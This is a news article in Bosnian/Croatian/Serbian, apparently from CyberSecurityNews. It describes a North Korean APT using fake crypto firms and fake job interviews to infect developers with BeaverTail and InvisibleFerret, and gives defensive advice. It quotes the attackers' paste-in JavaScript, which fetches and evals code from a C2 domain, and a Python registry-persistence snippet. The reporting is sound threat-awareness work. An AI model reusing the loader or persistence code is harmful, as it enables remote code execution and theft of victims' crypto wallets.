Sofisticirana sjevernokorejska grupa za napredne persistentne prijetnje (APT) poznata kao “Contagious Interview” osnovala je razrađene konsultantske kompanije za lažne kriptovalute kako bi ciljala osobe koje traže posao sa specijalizovanim malicioznim softverom.
Grupa, podjedinica zloglasne Lazarus grupe koju sponzoriše sjevernokorejska država, stvorila je tri providne kompanije – BlockNovas LLC, Angeloper Agency i SoftGlide LLC – za distribuciju malicioznog softvera putem obmanjujućih procesa razgovora za posao.
.webp)
Kampanja je usmjerena na profesionalce i programere kriptovaluta s obećanjima o visoko plaćenim udaljenim pozicijama.
Kandidati koji se prijavljuju za posao koji se bave ovim lažnim kompanijama su nesvjesno izloženi triju sojeva malicioznog softvera : BeaverTail, InvisibleFerret i OtterCookie.
Ovi maliciozni alati su posebno dizajnirani za krađu akreditiva novčanika za kriptovalute, podatke pretraživača i obezbjeđivanje backdoor pristupa mašinama žrtava.
Analitičari prijetnji Silent Push otkrili su ovu razrađenu šemu nakon što su identifikovali neobične konfiguracije u uzorcima malicioznog softvera BeaverTail.
.webp)
Njihova istraga je otkrila da hakeri u velikoj mjeri koriste slike generisane vještačkom inteligencijom kako bi kreirali uvjerljive profile “zaposlenih” na više platformi, uključujući LinkedIn, gdje lažne kompanije održavaju aktivno prisustvo zajedno sa falsifikovanim radnim istorijama i izjavama klijenata.
.webp)
Tehnička sofisticiranost APT grupe evidentna je u njihovoj strategiji implementacije malicioznog softvera na više platformi, koja utiče na Windows, macOS i Linux sisteme.
Jedna žrtva je prijavila da je njihov MetaMask novčanik kompromitovan ubrzo nakon pokretanja koda koji je dat tokom testa procijene vještina od BlockNovas-a.
.webp)
Analiza kompromitovanog sistema otkrila je veze sa komandnim i kontrolnim serverima na domenima uključujući lianxinxiao[.]com.
Mehanizam infekcije: Lažni tok intervjua
Proces zaraze počinje kada se kandidati prijave za pozicije putem legitimnih web stranica za zapošljavanje kao što su Upwork, Freelancer.com ili ploče za zapošljavanje specifične za kriptovalute.
Nakon prvog kontakta, kandidati se upućuju na portale kompanije gdje se susreću sa višestepenim procesom intervjua.
Kritična tačka infekcije javlja se tokom faze „procijene vještina“, gdje se od kandidata traži da snime video uvod.
Prilikom pokušaja pristupa dozvolama za kameru, stranica prikazuje poruku o grešci s navodnom ispravkom koja uključuje lijepljenje koda u terminal:-
fetch(eval(decodeURIComponent('\'lianxinxiao[.]com:5000/tokenizer'')))
.then(response => response.text())
.then(data => { eval(data); });Ovaj kod nevinog izgleda zapravo dohvaća i izvršava BeaverTail JavaScript malver, koji naknadno preuzima InvisibleFerret, backdoor baziran na Python-u.
Maliciozni softver uspostavlja postojanost kroz različite mehanizme u zavisnosti od operativnog sistema.
Na Windows sistemima kreira unose u registar:-
import winreg
key_path = r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
key = winreg.HKEY_CURRENT_USER
with winreg.OpenKey(key, key_path, 0, winreg.KEY_ALL_ACCESS) as registry_key:
winreg.SetValueEx(registry_key, "pythonws", 0, winreg.REG_SZ, f'{python_exe} {script_path}')Maliciozni softver posebno cilja novčanike kriptovaluta , uključujući MetaMask, BNB Chain, Coinbase, TronLink, Phantom, Crypto.com i Coin98.
Eksfiltrira podatke na servere koje kontrolišu napadači i može da primjeni dodatni teret na osnovu C2 instrukcija.
Kako ne bi postali žrtva ovakvih napada, stručnjaci za sajber sigurnost preporučuju temeljito ispitivanje ponuda za posao, nikada ne izvršavanje koda iz nepoznatih izvora tokom intervjua i korištenje namjenskih uređaja za upravljanje kriptovalutama.
Osobe koje traže posao treba da provjere legitimnost kompanije putem više kanala prije nego što se upuste u tehničke procjene koje zahtijevaju izvršavanje koda.
Izvor: CyberSecurityNews
